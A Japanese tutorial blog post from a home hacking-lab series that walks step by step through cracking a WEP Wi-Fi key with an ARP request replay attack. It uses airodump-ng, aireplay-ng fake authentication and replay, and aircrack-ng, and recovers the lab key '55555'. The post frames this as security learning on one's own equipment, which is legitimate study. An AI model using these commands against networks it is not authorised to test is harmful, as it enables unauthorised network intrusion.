LoginSignup
0
2

More than 1 year has passed since last update.

Kali Linux2022.1 でハッキングラボをつくってみる9 無線LANへのハッキング6 WEPへのハッキング ARP要求リプレイ攻撃

Last updated at Posted at 2022-05-23

はじめに

KaliLinuxで利用しているwifiアダプタが利用できないので、別のノートパソコンにaircrack-ngパッケージをインストールして動作を検証しています。挙動や作業に大きな代わりはないです。
ちなみに、ノートパソコンのOSはOpensuse Leap15.3です。

注意事項
記事で紹介されている行為を他人や団体、インフラなどの許可を得ずに行った場合、犯罪となる可能性が有ります。
あくまでも、記事の内容は情報セキュリティの学習です。読者様の所有・管理の機器、システムでのみ実行してください。
また、読者さまのシステムにトラブルが起きたとしても、私は責任を負いかねます。

ARP要求リプレイ攻撃

ARP要求を故意に繰り返したり、遅延させたりすることで、パケット(含むIV)を増加させる攻撃。

検証

無線LANアダプタのMACアドレスを変更する

この記事を参考にしてください。

無線LANアダプタをMonitorモードにする

この記事を参考にしてください。

airodump-ngを実行する

arp要求リプレイ攻撃用のフォルダを用意してから、airodump-ngコマンドを実行する。

mkdir arp_attack
cd arp _attack
sudo airodump-ng --channel 2 --bssid <ターゲットのbssid> --write arp-attack wlan0

aireplay-ngで偽の認証

新規に別の端末を立ち上げて、次のコマンドを実行する。

sudo aireplay-ng --fakeauth 0 -a <ターゲットのbssid> -h <送信元のMACアドレス> wlan0

aireplay-ngに--arpreplayオプションをつけてARPリクエストリプレイ攻撃

sudo aireplay-ng --arpreplay -b <ターゲットのbssid> -h <送信元のMACアドレス> wlan0
//または、
sudo aireplay-ng -3 -b <ターゲットのbssid> -h <送信元のMACアドレス> wlan0

-3オプションは、--arpreplayオプションの簡略表記。
スクリーンショット_2022-05-23_20-02-54arp攻撃.png

あっという間にDataの値が増えていく。
スクリーンショット_2022-05-23_20-04-00arp攻撃増加するData.png

wepキーを解析

さらに、新規に別の端末を立ち上げて、次のコマンドを実行する。

sudo aircrack-ng arp-attack-01.cap

無線LANのパスワードが"55555"だと判明した。
スクリーンショット_2022-05-23_20-05-24arp攻撃完了.png

おわりに

WEPでの解析検証は一通り終わった。
パスワード"55555"だと、どのWEPへのハッキング手法でも、だいたい25000IVsぐらい集めれば解析できた。
おおよその流れとして、無線LANアダプタのモード変更やMACアドレスの固定化のあとに、

  • キャプチャ担当のairodump-ng
  • 細工担当のaireplay-ng
  • 解析担当のaircrack-ng

の3つが共同してパスワード解析をする。
細工担当のaireplay-ngのオプションの違いで、chopchop攻撃やARPリクエストリプライ攻撃といった攻撃方法の選択をする。

オプションの対応表はこうなる

冗長表記 簡略表記
--fakeauth -1
--interactive -2
--arpreplay -3
--chopchop -4

※他にもあり

0
2
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
2